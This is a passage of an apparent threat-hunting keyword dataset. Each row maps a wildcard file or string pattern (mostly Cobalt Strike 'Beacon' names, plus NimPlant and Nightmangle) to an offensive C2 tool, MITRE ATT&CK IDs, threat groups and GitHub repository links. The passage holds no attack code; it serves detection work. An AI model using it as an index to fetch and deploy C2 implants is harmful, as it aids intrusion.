T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_top *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_top_callback*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*BeaconApi.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*beacon-c2-go*,offensive_tool_keyword,cobaltstrike,backdoor c2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wahyuhadi/beacon-c2-go,1,1,N/A,10,10,36,8,2020-01-14T11:15:42Z,2019-12-22T08:59:34Z -*BeaconCleanupProcess*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*BeaconConsoleWriter.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconGetSpawnTo*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*BeaconGetSpawnTo*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconGetSpawnTo*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconGetSpawnTo*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*beacongrapher.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*BeaconInjectProcess*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*BeaconInjectProcess*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconInjectProcess*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*BeaconInjectProcess*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*BeaconInjectTemporaryProcess*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*BeaconInjectTemporaryProcess*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BeaconInjectTemporaryProcess*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*BeaconJob.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BeaconJobWriter.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*beaconlogs.json*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*beaconlogtracker.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*BeaconNote.cna*,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*BeaconNotify.cna*,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 